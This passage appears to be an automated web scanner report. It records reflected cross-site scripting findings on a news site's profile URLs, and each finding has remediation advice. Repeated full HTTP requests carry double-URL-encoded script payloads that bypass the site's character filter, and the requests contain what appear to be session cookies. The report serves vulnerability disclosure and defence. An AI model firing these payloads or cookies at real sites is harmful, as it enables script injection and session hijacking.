GET /profile/rhbrown16bb6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60c21ad9/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:37 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:37 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=988 Connection: Keep-Alive Content-Length: 31048
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="rhbrown16bb6"><script>alert(1)</script>b60c21ad9"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6c8f8%253cscript%253ealert%25281%2529%253c%252fscript%253e5888331ce3d was submitted in the REST URL parameter 2. This input was echoed as 6c8f8<script>alert(1)</script>5888331ce3d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rhbrown6c8f8%253cscript%253ealert%25281%2529%253c%252fscript%253e5888331ce3d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:38 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:38 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=958 Connection: Keep-Alive Content-Length: 31027
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>rhbrown6c8f8<script>alert(1)</script>5888331ce3d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 666b3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9b6a89eab92 was submitted in the REST URL parameter 2. This input was echoed as 666b3"><script>alert(1)</script>9b6a89eab92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rickbroida666b3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9b6a89eab92/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:16:13 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:16:14 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=996 Connection: Keep-Alive Content-Length: 31081
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="rickbroida666b3"><script>alert(1)</script>9b6a89eab92"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a1d06%253cscript%253ealert%25281%2529%253c%252fscript%253e2be8ea29256 was submitted in the REST URL parameter 2. This input was echoed as a1d06<script>alert(1)</script>2be8ea29256 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rickbroidaa1d06%253cscript%253ealert%25281%2529%253c%252fscript%253e2be8ea29256/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:16:15 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:16:15 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=995 Connection: Keep-Alive Content-Length: 31067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>rickbroidaa1d06<script>alert(1)</script>2be8ea29256's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6ed4b%253cscript%253ealert%25281%2529%253c%252fscript%253e0a507c72146 was submitted in the REST URL parameter 2. This input was echoed as 6ed4b<script>alert(1)</script>0a507c72146 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ronsgal16ed4b%253cscript%253ealert%25281%2529%253c%252fscript%253e0a507c72146/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:26 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:26 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=957 Connection: Keep-Alive Content-Length: 31028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>ronsgal16ed4b<script>alert(1)</script>0a507c72146's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5962%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea799e949b23 was submitted in the REST URL parameter 2. This input was echoed as f5962"><script>alert(1)</script>a799e949b23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ronsgal1f5962%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea799e949b23/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:24 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:24 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=966 Connection: Keep-Alive Content-Length: 31068
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="ronsgal1f5962"><script>alert(1)</script>a799e949b23"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec0f92da961c was submitted in the REST URL parameter 2. This input was echoed as 28a93"><script>alert(1)</script>c0f92da961c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/sandonet28a93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec0f92da961c/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:13 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:13 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=975 Connection: Keep-Alive Content-Length: 31108
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="sandonet28a93"><script>alert(1)</script>c0f92da961c"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0653%253cscript%253ealert%25281%2529%253c%252fscript%253ee6776729ce2 was submitted in the REST URL parameter 2. This input was echoed as b0653<script>alert(1)</script>e6776729ce2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/sandonetb0653%253cscript%253ealert%25281%2529%253c%252fscript%253ee6776729ce2/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:14 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:14 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=969 Connection: Keep-Alive Content-Length: 31073
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>sandonetb0653<script>alert(1)</script>e6776729ce2's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e00b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0bae1c270d9 was submitted in the REST URL parameter 2. This input was echoed as 7e00b"><script>alert(1)</script>0bae1c270d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/selloco7e00b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0bae1c270d9/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:32 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:32 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=990 Connection: Keep-Alive Content-Length: 31114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="selloco7e00b"><script>alert(1)</script>0bae1c270d9"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df8e6%253cscript%253ealert%25281%2529%253c%252fscript%253e8804dd94f9f was submitted in the REST URL parameter 2. This input was echoed as df8e6<script>alert(1)</script>8804dd94f9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/sellocodf8e6%253cscript%253ealert%25281%2529%253c%252fscript%253e8804dd94f9f/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:34 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:34 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=992 Connection: Keep-Alive Content-Length: 30989
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>sellocodf8e6<script>alert(1)</script>8804dd94f9f's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4256%253cscript%253ealert%25281%2529%253c%252fscript%253ea03fe790498 was submitted in the REST URL parameter 2. This input was echoed as c4256<script>alert(1)</script>a03fe790498 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/sharmajuniorc4256%253cscript%253ealert%25281%2529%253c%252fscript%253ea03fe790498/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:45 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:46 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=969 Connection: Keep-Alive Content-Length: 31118
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>sharmajuniorc4256<script>alert(1)</script>a03fe790498's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19fa04b638d was submitted in the REST URL parameter 2. This input was echoed as e1f97"><script>alert(1)</script>19fa04b638d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
